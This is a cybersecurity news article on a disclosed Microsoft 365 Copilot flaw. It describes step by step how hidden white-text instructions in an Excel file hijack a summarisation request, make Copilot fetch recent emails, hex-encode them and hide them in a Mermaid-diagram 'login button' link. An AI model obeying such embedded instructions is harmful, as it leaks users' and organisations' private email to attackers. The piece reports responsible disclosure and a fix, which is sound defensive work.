Raleigh, NC

32°F
Overcast Clouds Humidity: 90%
Wind: 5.14 M/S

Copilot Flaw Allows Attackers to Steal Microsoft 365 Tenant Data

Copilot Flaw Allows Attackers to Steal Microsoft 365 Tenant Data

A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) allows attackers to steal sensitive tenant data, including recent corporate emails, using indirect prompt injection attacks. This flaw, discovered by researcher Adam Logue, exploits the AI assistant's integration with Office documents and its built-in support for Mermaid diagrams. 

How the Data Exfiltration Attack Works 

The attack is initiated when a user asks M365 Copilot to summarize a specifically crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to silently redirect the AI’s behavior. 

These indirect prompts override the original summarization request. Instead, they force Copilot to use its internal search_enterprise_emails tool to retrieve recent corporate emails. The captured email content is then hex-encoded and fragmented into short lines to bypass the character limits of the diagram tool. 

Copilot then generates a Mermaid diagram, which is a JavaScript-based tool used for creating flowcharts and charts. The final output is an innocent looking diagram that masquerades as a "login button" complete with a lock emoji and CSS styling. Crucially, this button's hyperlink embeds the entirety of the stolen, encoded email data, allowing the attacker to exfiltrate the information without requiring direct user interaction beyond the initial prompt. 

Disclosure and Mitigation 

Researcher Adam Logue reported the vulnerability to the Microsoft Security Response Center (MSRC) in August 2025 following discussions at DEFCON. MSRC confirmed the vulnerability in September and released a fix by September 26. However, M365 Copilot fell outside the scope of the bug bounty program, so no reward was issued. 

This incident underscores the serious risks inherent in integrating large language models like Copilot with enterprise environments that handle sensitive data. As AI tools connect to APIs and internal resources, developers and organizations must prioritize defenses against indirect injection techniques. Microsoft has emphasized its ongoing mitigation efforts, but security experts continue to urge users to verify the source of all documents and monitor AI outputs closely. 

Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post. 

Image

With Cybersecurity Insights, current news and event trends will be captured on cybersecurity, recent systems / cyber-attacks, artificial intelligence (AI), technology innovation happening around the world; to keep our viewers fast abreast with the current happening with technology, system security, and how its effect our lives and ecosystem. 

Please fill the required field.